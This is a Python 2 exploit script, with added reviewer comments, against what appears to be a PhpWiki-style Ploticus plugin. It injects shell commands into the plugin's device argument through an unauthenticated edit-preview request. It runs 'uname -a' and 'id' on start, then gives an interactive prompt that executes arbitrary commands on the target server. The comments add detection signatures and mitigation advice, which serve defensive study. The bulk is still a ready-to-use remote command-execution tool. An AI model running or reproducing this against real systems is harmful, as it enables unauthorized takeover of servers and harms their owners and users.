###############################################################
#_______ __ _
# / __/_______ _____/ /_____ ___(_) /__(_)
#/ /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /
#/_/\__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/
# /_/ /_/ /_/
# Diskovered in Nov/Dec 2011
###############################################################
# Python 2 script (print statements, urllib2, raw_input); it does not run
# unmodified on Python 3.
#
# What the code does: it POSTs an edit *preview* request for the wiki page
# "HeIp" whose content is a <<Ploticus ...>> plugin call with shell
# metacharacters in the plugin's `device` argument, then prints whatever the
# server returns between two marker strings. That only produces output if
# the server places `device` on a shell command line without escaping, i.e.
# an OS command injection in the plugin. This is inferred from the payload;
# the server-side code is not on this page.
# NOTE(review): the <<Plugin args>> markup and the /index.php/<page> URL
# look like a PhpWiki-style wiki -- confirm against the original advisory.
#
# NOTE(review), defender view:
#  - Detection: unauthenticated POST to <base>/index.php/HeIp carrying
#    action=edit, edit[preview]=Preview and an edit[content] value that
#    contains "<<Ploticus" with ";" inside device="..."; responses that
#    contain the markers "123:::" and ":::123".
#  - Mitigation: disable or remove the Ploticus plugin if it is not needed,
#    apply the vendor fix (fixed version is not stated on this page), make
#    the plugin validate its arguments against an allow-list and shell-escape
#    them before any exec call, and require authentication for edit/preview.

import urllib
import urllib2
import sys


def banner():
    """Print the ASCII-art banner to stdout."""
    print " _______ __ _ "
    print " / __/_______ _____/ /_____ ___(_) /__(_)"
    # NOTE(review): "</code>" below is most likely an HTML-extraction artifact
    # standing in for a backtick in the original art; left as found.
    print " / /_/ / / / __ </code>/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
    print " / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /"
    print " /_/\__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ "
    print " /_/ /_/ /_/ \n"


def usage():
    """Print the banner followed by a one-line invocation example."""
    banner()
    print " [+] Usage example"
    print " [-] python " + sys.argv[0] + " http://path.to/wiki"


# Exactly one argument is expected: the base URL of the wiki.
if len(sys.argv)< 2:
    usage()
    quit()

# Base URL taken verbatim from the command line; it is concatenated into the
# request URL below without validation or normalisation.
domain = sys.argv[1]


def commandexec(cmd):
    """POST one preview request embedding *cmd* and return the delimited reply.

    The form fields are pagename=HeIp, action=edit, edit[preview]=Preview and
    an edit[content] holding a <<Ploticus ...>> call. The `device` value
    wraps *cmd* between two `echo` marker commands, each redirected to stderr
    (1>&2). The text between "123:::\\n" and "\\n:::123" in the HTTP response
    body is returned.

    NOTE(review): presumably the plugin echoes the program's stderr into the
    preview page, which is why everything is redirected there -- not
    verifiable from this page.
    NOTE(review): a preview request is used rather than a save, presumably
    so no page revision is stored -- confirm against the wiki's edit handler.
    """
    # `cmd` is concatenated into the field value as-is; urlencode only applies
    # URL encoding to the finished string.
    data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
    # Supplying `data` makes urllib2 issue a POST. No cookies or credentials
    # are attached, and no timeout is set.
    cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
    cmd2 = urllib2.urlopen(cmd1)
    output = cmd2.read()
    # str.find returns -1 when a marker is absent, so a response without the
    # markers yields an unrelated slice of the page rather than an error.
    firstloc = output.find("123:::\n") + len("123:::\n")
    secondloc = output.find("\n:::123")
    return output[firstloc:secondloc]


banner()
# Two fixed requests are sent as soon as the script starts.
print commandexec('uname -a')
print commandexec('id')
# `quit` is still the interpreter's built-in object on the first test, so the
# comparison with 1 is true; the loop ends once the name is rebound to 1.
while(quit != 1):
    cmd = raw_input('Run a command: ')
    if cmd == 'quit':
        print "[-] Hope you had fun :)"
        quit = 1
    if cmd != 'quit':
        # Every other input line is sent to the server as one request.
        print commandexec(cmd)